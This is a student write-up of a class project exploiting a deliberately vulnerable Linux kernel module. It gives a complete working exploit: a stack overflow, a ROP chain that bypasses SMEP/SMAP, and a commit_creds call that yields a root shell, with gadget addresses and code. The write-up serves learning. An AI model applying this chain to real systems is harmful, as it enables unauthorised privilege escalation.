TL;DR

Buffer overflow in a kernel module → RIP control → ROP chain to bypass SMEP/SMAP → commit_creds(prepare_kernel_cred(0)) → root shell 🔓


Note: This is my first kernel exploitation writeup! This was a school project at EPITA, not a CTF challenge. I was learning kernel security concepts for the first time, so the approach might not be the most optimized. Feedback welcome! 🙂


Challenge Overview

This is a class project where we had to exploit a vulnerable kernel module called kexpita. The module is a character device driver with a classic buffer overflow vulnerability.

Environment:

  • Linux kernel 5.15.180
  • x86_64 architecture
  • QEMU virtualization
  • SMEP & SMAP enabled (the hard part!)
  • KASLR & KPTI disabled (to keep things manageable for learning)

QEMU command line:

qemu-system-x86_64 \
    -m 128M \
    -cpu kvm64,+smep,+smap \
    -kernel bzImage \
    -initrd initramfs.cpio.gz \
    -append "console=ttyS0 nopti nokaslr quiet panic=1" \
    -s

What is ret2usr?

Before diving in, let’s understand the classic attack we’re building on:

ret2usr (return-to-user) is a kernel exploitation technique where you hijack kernel execution to jump to attacker-controlled code in userspace. Here’s how it works:

  1. Corrupt kernel stack via buffer overflow
  2. Redirect RIP to a userspace function
  3. Execute privileged operations in kernel mode (your code runs as ring 0!)
  4. Escalate privileges via commit_creds(prepare_kernel_cred(0))
  5. Return cleanly to userspace with root privileges

The catch: Modern kernels have SMEP (Supervisor Mode Execution Prevention) which blocks executing userspace code from kernel mode. So we need ROP instead! 🎯

Memory Layout (x86_64)

Understanding the memory split is key:

Userspace:   0x0000000000000000 → 0x00007FFFFFFFFFFF
Kernelspace: 0xFFFF800000000000 → 0xFFFFFFFFFFFFFFFF

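Transitions between the two go through swapgs (which swaps the current GS base with the value saved in the IA32_KERNEL_GS_BASE MSR) and iretq (which pops RIP, CS, RFLAGS, RSP and SS from the stack and changes the privilege level).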
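To make the split concrete, here is a tiny helper that classifies a 64-bit address using the two ranges above. It is only a sanity-check sketch: the function name classify is made up for this writeup, and it assumes the usual 48-bit canonical addressing.

```python
# Address ranges from the memory layout above (48-bit canonical addressing assumed).
USER_MAX = 0x00007FFFFFFFFFFF
KERNEL_MIN = 0xFFFF800000000000
ADDR_MAX = 0xFFFFFFFFFFFFFFFF


def classify(addr: int) -> str:
    """Return 'user', 'kernel' or 'non-canonical' for a 64-bit address."""
    if 0 <= addr <= USER_MAX:
        return "user"
    if KERNEL_MIN <= addr <= ADDR_MAX:
        return "kernel"
    # Anything in the hole between the two halves faults when dereferenced.
    return "non-canonical"


if __name__ == "__main__":
    for addr in (0x401000, 0xFFFFFFFF81097E80, 0x0000800000000000):
        print(f"{addr:#018x}: {classify(addr)}")
```

Handy when a crash dump shows a RIP you don't recognise: if it lands in the user half, SMEP is what stopped you.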

The Vulnerability

Here’s the vulnerable kernel module code:

#define BUFFER_SIZE 0x400

static ssize_t kexpita_write(struct file *file,
      const char __user *buf, size_t count,
      loff_t *f_pos)
{
  char kbuf[BUFFER_SIZE] = { 0 };  // Stack buffer
  printk(KERN_INFO "module_write called\n");
  
  // No size check on count! 🚨
  if (_copy_from_user(kbuf, buf, count)) {
    printk(KERN_INFO "copy_from_user failed\n");
    return -EINVAL;
  }
  
  memcpy(g_buf, kbuf, BUFFER_SIZE);
  return count;
}

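The bug: _copy_from_user() copies the user-provided count bytes into kbuf without ever comparing count to BUFFER_SIZE. We can send more than 0x400 bytes and overflow the kernel stack! Note that the module calls _copy_from_user() directly, which skips the object-size check that the regular copy_from_user() wrapper performs.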

Finding the Offset

Classic cyclic pattern approach to find where we control RIP:

char pattern[] = "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaaj...";
write(fd, pattern, 0x430);

Kernel crashes with RIP = 0x6b61616e6b6161

$ cyclic -l 0x6b61616e6b6161
1049  # 0x419 bytes

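The lookup lands one byte off, though. The saved return address sits on an 8-byte boundary: 0x400 bytes of kbuf followed by three saved registers (RBX, RBP, R12), so the actual RIP offset is 0x418 bytes.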
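The 0x418 figure can be double-checked with plain arithmetic. The sketch below assumes the frame layout used later in the ROP chain (kbuf, then saved RBX, RBP and R12, then the return address); the names frame_layout and SAVED_REGS are mine, not something from the module.

```python
BUFFER_SIZE = 0x400                   # size of kbuf in kexpita_write
SAVED_REGS = ("rbx", "rbp", "r12")    # assumed callee-saved registers above kbuf


def frame_layout(buffer_size=BUFFER_SIZE, saved_regs=SAVED_REGS):
    """Map each stack slot name to its byte offset from the start of kbuf."""
    layout = {"kbuf": 0}
    offset = buffer_size
    for reg in saved_regs:
        layout[reg] = offset
        offset += 8                   # every saved register takes one qword
    layout["saved_rip"] = offset      # the return address comes right after
    return layout


if __name__ == "__main__":
    for name, off in frame_layout().items():
        print(f"{name:>9} @ +{off:#x}")
```

If the compiler had saved a different set of registers, the offset would move in steps of 8, which is why an odd value like 0x419 can't be right.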

Exploitation Strategy

Phase 1: Without SMEP/SMAP (Easy Mode)

When SMEP/SMAP are disabled, we can use classic ret2usr:

void privesc() {
    asm(".intel_syntax noprefix;"
        "movabs rax, prepare_kernel_cred;"
        "xor rdi, rdi;"        // arg: 0 for root
        "call rax;"            // RAX = new cred struct
        "mov rdi, rax;"        // arg: cred pointer
        "movabs rax, commit_creds;"
        "call rax;"            // Apply root creds
        
        "swapgs;"              // Switch to userspace GS
        
        // Build iretq frame
        "mov r15, user_ss;"
        "push r15;"
        "mov r15, user_sp;"
        "push r15;"
        "mov r15, user_rflags;"
        "push r15;"
        "mov r15, user_cs;"
        "push r15;"
        "mov r15, user_rip;"
        "push r15;"
        
        "iretq;"               // Return to userspace
        ".att_syntax;");
}

Just overwrite the saved RIP with the address of privesc() and boom, root! But that’s the easy part…

Phase 2: With SMEP/SMAP (Real Challenge)

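SMEP prevents the kernel from executing userspace pages, and SMAP prevents it from reading or writing them outside of the explicit copy helpers, so pivoting the stack into userspace memory is out too. We need a pure ROP solution that uses only kernel gadgets and lives on the kernel stack itself.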
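Both protections are just bits in the CR4 control register (SMEP is bit 20, SMAP is bit 21), so it is easy to confirm what the VM is really running with. Here is a small decoding sketch; decode_cr4 is a name I made up, and the sample values are illustrative rather than taken from my VM. A kernel oops prints the current CR4 value, which is one place to get the input from.

```python
CR4_SMEP = 1 << 20   # Supervisor Mode Execution Prevention
CR4_SMAP = 1 << 21   # Supervisor Mode Access Prevention


def decode_cr4(cr4: int) -> dict:
    """Report whether SMEP and SMAP are set in a raw CR4 value."""
    return {
        "smep": bool(cr4 & CR4_SMEP),
        "smap": bool(cr4 & CR4_SMAP),
    }


if __name__ == "__main__":
    # Illustrative values only: one with both bits set, one with neither.
    for value in (0x3006F0, 0x0006F0):
        print(f"CR4={value:#x} -> {decode_cr4(value)}")
```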

The goal: Call commit_creds(prepare_kernel_cred(0)) entirely with ROP.

Kernel Symbol Discovery

Since KASLR is disabled, kernel addresses are static:

uint64_t prepare_kernel_cred = 0xffffffff81097e80;
uint64_t commit_creds = 0xffffffff81097bd0;

These are found via /proc/kallsyms:

$ cat /proc/kallsyms | grep prepare_kernel_cred
ffffffff81097e80 T prepare_kernel_cred

$ cat /proc/kallsyms | grep commit_creds
ffffffff81097bd0 T commit_creds
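Grepping twice works, but the same lookup is easy to script. The sketch below parses kallsyms-style text into a dictionary; parse_kallsyms is a hypothetical helper, and the sample input is the two lines shown above. Keep in mind that on systems where kernel pointers are hidden from unprivileged users, /proc/kallsyms shows zeros instead of real addresses, so check the result before trusting it.

```python
def parse_kallsyms(text, wanted):
    """Return {symbol: address} for every wanted symbol found in kallsyms text."""
    found = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue                      # skip blank or malformed lines
        addr, _sym_type, name = parts[0], parts[1], parts[2]
        if name in wanted:
            found[name] = int(addr, 16)   # addresses are printed as bare hex
    return found


SAMPLE = """\
ffffffff81097e80 T prepare_kernel_cred
ffffffff81097bd0 T commit_creds
"""

if __name__ == "__main__":
    symbols = parse_kallsyms(SAMPLE, {"prepare_kernel_cred", "commit_creds"})
    for name, addr in symbols.items():
        print(f"{name} = {addr:#x}")
```

On the target you would feed it the contents of /proc/kallsyms instead of SAMPLE.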

The ROP Challenge: RAX → RDI

Here’s the tricky part. We need to:

  1. Call prepare_kernel_cred(0) → returns pointer in RAX
  2. Move that pointer to RDI
  3. Call commit_creds(rdi)

Problem: I couldn’t find a clean mov rdi, rax ; ret gadget in this kernel image!

Finding Gadgets

We need to search the kernel image for useful gadgets. I used ropper, but bzImage is a compressed boot image rather than a plain ELF, so we need to extract the kernel code first:

# Extract kernel code
$ python3 extract_kernel.py bzImage vmlinux.bin

# Find gadgets
$ ropper --file vmlinux.bin --search "pop rdi"

But ropper treats the extracted file as a raw blob, so it reports offsets from the start of the file, not absolute kernel addresses!
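For the three gadgets this exploit ends up needing, the search can also be sketched as a plain byte scan. This is not what ropper does internally, just an illustration: the opcodes are the standard x86_64 encodings (5f c3 for pop rdi ; ret, 5a c3 for pop rdx ; ret, 50 ff e2 for push rax ; jmp rdx), and the code assumes that offset 0 of the extracted blob maps to the kernel base 0xffffffff81000000.

```python
KERNEL_BASE = 0xFFFFFFFF81000000  # assumed address of the first byte of the blob

# Raw x86_64 encodings of the gadgets we care about.
GADGETS = {
    "pop rdi ; ret": bytes([0x5F, 0xC3]),
    "pop rdx ; ret": bytes([0x5A, 0xC3]),
    "push rax ; jmp rdx": bytes([0x50, 0xFF, 0xE2]),
}


def find_gadgets(blob: bytes, base: int = KERNEL_BASE) -> dict:
    """Return {gadget name: [absolute addresses]} for every byte match."""
    hits = {}
    for name, pattern in GADGETS.items():
        addrs = []
        pos = blob.find(pattern)
        while pos != -1:
            addrs.append(base + pos)          # file offset -> kernel address
            pos = blob.find(pattern, pos + 1)
        hits[name] = addrs
    return hits


if __name__ == "__main__":
    # Tiny synthetic blob: NOP padding with two gadgets planted in it.
    demo = b"\x90" * 0x10 + b"\x5f\xc3" + b"\x90" * 4 + b"\x50\xff\xe2"
    for name, addrs in find_gadgets(demo).items():
        print(name, [hex(a) for a in addrs])
```

A byte match says nothing about whether the bytes sit in executable memory, so every hit still has to be checked in GDB.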

Address Calculator

I wrote a quick Python script to convert offsets to real kernel addresses:

#!/usr/bin/env python3
import sys

BASE_ADDR = 0xffffffff81000000  # kernel base

def main():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <offset>")
        sys.exit(1)
    
    offset = int(sys.argv[1], 16) if sys.argv[1].startswith("0x") else int(sys.argv[1])
    final_addr = BASE_ADDR + offset
    print(f"[+] Calculated address: {hex(final_addr)}")

if __name__ == "__main__":
    main()

Usage:

$ python3 calc_addr.py 0x15b0cd
[+] Calculated address: 0xffffffff8115b0cd  # pop rdi ; ret

Gadget Validation

Always verify gadgets in GDB before using them:

pwndbg> x/3i 0xffffffff8115b0cd
=> 0xffffffff8115b0cd: pop    rdi
   0xffffffff8115b0ce: ret    
   0xffffffff8115b0cf: nop

The Solution: Push-Pop Chaining

Since we can’t do mov rdi, rax, we chain gadgets creatively:

Key gadgets:

pop_rdi_ret          = 0xffffffff8115b0cd  # pop rdi ; ret
pop_rdx_ret          = 0xffffffff81053898  # pop rdx ; ret  
push_rax_jmp_rdx     = 0xffffffff813d134c  # push rax ; jmp rdx

The trick:

  1. Put pop_rdi_ret address in RDX
  2. Call push_rax_jmp_rdx
  3. This pushes RAX to stack, then jumps to pop_rdi_ret
  4. The pop loads RAX value into RDI!

Mind = blown 🤯
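If the four steps above feel like sleight of hand, it helps to replay them on a toy stack machine. The sketch below is a simulation only: gadgets are represented by their names instead of addresses, and simulate_transfer is a helper invented for this explanation.

```python
def simulate_transfer(rax_value):
    """Replay pop rdx / push rax ; jmp rdx / pop rdi and return the registers."""
    regs = {"rax": rax_value, "rdx": None, "rdi": None}

    # The part of the chain that follows prepare_kernel_cred, in memory order.
    chain = ["pop_rdx_ret", "pop_rdi_ret", "push_rax_jmp_rdx", "commit_creds"]
    stack = list(reversed(chain))     # stack.pop() yields the next qword at RSP

    pc = stack.pop()                  # prepare_kernel_cred's ret lands here
    while pc != "commit_creds":
        if pc == "pop_rdx_ret":
            regs["rdx"] = stack.pop() # RDX = "pop_rdi_ret"
            pc = stack.pop()          # ret
        elif pc == "push_rax_jmp_rdx":
            stack.append(regs["rax"]) # RAX goes on top of the stack
            pc = regs["rdx"]          # jump to the gadget stored in RDX
        elif pc == "pop_rdi_ret":
            regs["rdi"] = stack.pop() # pops the value we just pushed
            pc = stack.pop()          # ret into commit_creds
    return regs


if __name__ == "__main__":
    print(simulate_transfer(0xDEADBEEF))
```

The key point is that push rax and pop rdi cancel out on the stack, so RSP ends up exactly where it needs to be for the ret into commit_creds.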

Building the ROP Chain

void overflow(){
    char payload[0x800];  
    memset(payload, 'A', sizeof(payload));
    uint64_t *ptr = (uint64_t *)payload;
    
    // Pad to saved registers (calling convention)
    ptr[0x400/8] = 0x4141414141414141;  // RBX  
    ptr[0x408/8] = 0x4242424242424242;  // RBP
    ptr[0x410/8] = 0x4343434343434343;  // R12
    
    // ROP chain starts at offset 0x418 (saved RIP)
    uint64_t *rop = &ptr[0x418/8];
    int i = 0;
    
    // === Phase 1: prepare_kernel_cred(0) ===
    rop[i++] = pop_rdi_ret;
    rop[i++] = 0;                        // RDI = 0 (root)
    rop[i++] = prepare_kernel_cred;      // Call it, result in RAX
    
    // === Phase 2: Transfer RAX → RDI ===
    rop[i++] = pop_rdx_ret;
    rop[i++] = pop_rdi_ret;              // RDX = address of "pop rdi ; ret"
    rop[i++] = push_rax_jmp_rdx;         // Push RAX, jump to pop_rdi_ret
                                         // → RDI now contains RAX!
    
    // === Phase 3: commit_creds(cred) ===
    rop[i++] = commit_creds;             // RDI already set from above
    
    // === Phase 4: Return to userspace ===
    rop[i++] = swapgs_restore_regs_and_return_to_usermode;
    
    // swapgs_restore expects 15 registers on stack
    rop[i++] = 0;  // r15
    rop[i++] = 0;  // r14
    rop[i++] = 0;  // r13
    rop[i++] = 0;  // r12
    rop[i++] = 0;  // rbp
    rop[i++] = 0;  // rbx
    rop[i++] = 0;  // r11
    rop[i++] = 0;  // r10
    rop[i++] = 0;  // r9
    rop[i++] = 0;  // r8
    rop[i++] = 0;  // rax
    rop[i++] = 0;  // rcx
    rop[i++] = 0;  // rdx
    rop[i++] = 0;  // rsi
    rop[i++] = 0;  // rdi
    
    // orig_ax (syscall context marker)
    rop[i++] = 0xffffffffffffffff;
    
    // iretq frame (return to userspace)
    rop[i++] = user_rip;     // RIP → spawn_shell()
    rop[i++] = user_cs;      // CS (0x33)
    rop[i++] = user_rflags;  // RFLAGS
    rop[i++] = user_sp;      // RSP
    rop[i++] = user_ss;      // SS (0x2b)
    
    size_t total = 0x418 + (i * 8);
    write(global_fd, payload, total);
}
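It is worth checking the payload size and layout offline before crashing the VM a dozen times. The sketch below rebuilds the same chain with struct.pack, using the addresses from this writeup. build_payload is a hypothetical helper, the user_* values passed in the demo are placeholders rather than real saved state, and the padding is all 'A' bytes instead of the distinct register markers used in the C version.

```python
import struct

# Addresses from this writeup (KASLR disabled).
PREPARE_KERNEL_CRED = 0xFFFFFFFF81097E80
COMMIT_CREDS = 0xFFFFFFFF81097BD0
POP_RDI_RET = 0xFFFFFFFF8115B0CD
POP_RDX_RET = 0xFFFFFFFF81053898
PUSH_RAX_JMP_RDX = 0xFFFFFFFF813D134C
SWAPGS_RESTORE = 0xFFFFFFFF81A00A70
RIP_OFFSET = 0x418


def build_payload(user_rip, user_cs, user_rflags, user_sp, user_ss):
    """Return the overflow payload as bytes: padding followed by the ROP chain."""
    chain = [
        POP_RDI_RET, 0, PREPARE_KERNEL_CRED,         # prepare_kernel_cred(0)
        POP_RDX_RET, POP_RDI_RET, PUSH_RAX_JMP_RDX,  # RDI = RAX
        COMMIT_CREDS,                                # commit_creds(RDI)
        SWAPGS_RESTORE,
        *([0] * 15),                                 # r15 ... rdi
        0xFFFFFFFFFFFFFFFF,                          # orig_ax
        user_rip, user_cs, user_rflags, user_sp, user_ss,  # iretq frame
    ]
    return b"A" * RIP_OFFSET + struct.pack(f"<{len(chain)}Q", *chain)


if __name__ == "__main__":
    # Placeholder userspace state, for size checking only.
    payload = build_payload(0x401000, 0x33, 0x246, 0x7FFD00000000, 0x2B)
    print(f"payload length: {len(payload):#x}")
```

The chain is 29 qwords long, so the whole write should come out at 0x418 + 29 * 8 = 0x500 bytes.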

The Magic of swapgs_restore_regs_and_return_to_usermode

This kernel function is a gift for exploitation:

  1. Restores all registers from stack (R15 → RDI in order)
  2. Executes swapgs to switch to userspace segment
  3. Performs iretq for atomic transition to ring 3

It’s like the kernel saying “here, let me help you return to userspace cleanly” 😅
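The last five qwords of the chain are what iretq consumes, and the CS and SS values decide which ring we land in. Here is a small sketch that decodes a segment selector into its index, table and requested privilege level (the low two bits). decode_selector and returns_to_ring3 are names made up for this writeup; 0x33 and 0x2b are the userspace selectors used in the chain above.

```python
# Order in which iretq pops the frame, lowest stack address first.
IRET_FRAME_ORDER = ("rip", "cs", "rflags", "rsp", "ss")


def decode_selector(selector: int) -> dict:
    """Split a segment selector into descriptor index, table and RPL."""
    return {
        "index": selector >> 3,                        # descriptor table index
        "table": "LDT" if selector & 0b100 else "GDT", # table indicator bit
        "rpl": selector & 0b11,                        # requested privilege level
    }


def returns_to_ring3(frame: dict) -> bool:
    """True if both CS and SS in the frame request privilege level 3."""
    return (decode_selector(frame["cs"])["rpl"] == 3
            and decode_selector(frame["ss"])["rpl"] == 3)


if __name__ == "__main__":
    for name, sel in (("user_cs", 0x33), ("user_ss", 0x2B)):
        print(name, decode_selector(sel))
```

If save_state() ever hands you a CS whose low two bits are not 3, something went wrong before the exploit even started.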

Post-Exploitation: Stable Shell

To avoid segfaults after the exploit, we use fork():

void spawn_shell() {
    if (getuid() == 0) {
        printf("[+] got root (uid = 0)\n");
        
        if (fork() == 0) {
            // Child: clean process without corrupted stack
            execl("/bin/sh", "sh", NULL);
            exit(0);
        } else {
            // Parent: wait for shell to exit
            wait(NULL);
            puts("[*] Shell exited");
            exit(0);
        }
    }
}

Why fork? The parent process has a corrupted kernel stack. Forking creates a “clean” child that inherits root privileges but without the corruption!

Complete Exploit

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>   // uint64_t
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>

// Kernel symbols (no KASLR)
uint64_t prepare_kernel_cred = 0xffffffff81097e80;
uint64_t commit_creds = 0xffffffff81097bd0;

// ROP gadgets
uint64_t pop_rdi_ret = 0xffffffff8115b0cd;
uint64_t pop_rdx_ret = 0xffffffff81053898;
uint64_t push_rax_jmp_rdx = 0xffffffff813d134c;
uint64_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81a00a70;

// Userspace state (saved before triggering exploit)
uint64_t user_cs, user_ss, user_rflags, user_sp, user_rip;

int global_fd;

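void spawn_shell(void);  // defined below; declared here so save_state() can take its address

void save_state() {
    // GCC inline asm defaults to AT&T syntax, so switch to Intel explicitly
    asm(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    user_rip = (uint64_t)spawn_shell;
}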

void spawn_shell() {
    if (getuid() == 0) {
        printf("[+] got root!\n");
        if (fork() == 0) {
            execl("/bin/sh", "sh", NULL);
            exit(0);
        }
        wait(NULL);
        exit(0);
    }
}

void overflow() {
    char payload[0x800];  
    memset(payload, 'A', sizeof(payload));
    uint64_t *ptr = (uint64_t *)payload;
    
    ptr[0x400/8] = 0x4141414141414141;
    ptr[0x408/8] = 0x4242424242424242;
    ptr[0x410/8] = 0x4343434343434343;
    
    uint64_t *rop = &ptr[0x418/8];
    int i = 0;
    
    rop[i++] = pop_rdi_ret;
    rop[i++] = 0;
    rop[i++] = prepare_kernel_cred;
    
    rop[i++] = pop_rdx_ret;
    rop[i++] = pop_rdi_ret;
    rop[i++] = push_rax_jmp_rdx;
    
    rop[i++] = commit_creds;
    
    rop[i++] = swapgs_restore_regs_and_return_to_usermode;
    rop[i++] = 0; rop[i++] = 0; rop[i++] = 0; rop[i++] = 0; rop[i++] = 0;
    rop[i++] = 0; rop[i++] = 0; rop[i++] = 0; rop[i++] = 0; rop[i++] = 0;
    rop[i++] = 0; rop[i++] = 0; rop[i++] = 0; rop[i++] = 0; rop[i++] = 0;
    
    rop[i++] = 0xffffffffffffffff;
    
    rop[i++] = user_rip;
    rop[i++] = user_cs;
    rop[i++] = user_rflags;
    rop[i++] = user_sp;
    rop[i++] = user_ss;
    
    size_t total = 0x418 + (i * 8);
    write(global_fd, payload, total);
}

int main() {
    printf("[*] Opening /dev/kexpita\n");
    global_fd = open("/dev/kexpita", O_RDWR);
    if (global_fd < 0) {
        perror("open");
        exit(1);
    }
    
    printf("[*] Saving userspace state\n");
    save_state();
    
    printf("[*] Triggering overflow\n");
    overflow();
    
    printf("[!] Should not reach here\n");
    close(global_fd);
    return 0;
}

Running the Exploit

$ gcc -o exploit exploit.c -static
$ ./exploit
[*] Opening /dev/kexpita
[*] Saving userspace state
[*] Triggering overflow
[+] got root!
# id
uid=0(root) gid=0(root) groups=0(root)
# 

Root shell achieved! 🎉

Lessons Learned

Kernel exploitation techniques:

  1. ret2usr vs ROP - Understanding when you can use userspace code vs when you need pure kernel gadgets (SMEP)

  2. Gadget hunting in kernels - Kernel binaries aren’t standard ELFs, need special extraction and analysis

  3. Register transfer creativity - When there’s no direct gadget, chain multiple gadgets (push-pop technique)

  4. Calling conventions - Understanding x86_64 ABI for function calls and register usage

  5. State restoration - Using kernel’s own cleanup functions (swapgs_restore_regs_and_return_to_usermode)

  6. Stack corruption handling - Forking to create stable shell from corrupted process

  7. Kernel symbols - Using /proc/kallsyms for address discovery (when KASLR is off)

Key insight: Modern protections like SMEP/SMAP make exploitation harder, but with enough kernel gadgets, you can still build a complete privilege escalation chain. The kernel itself gives you the tools to break it! 🔓


Resources that helped: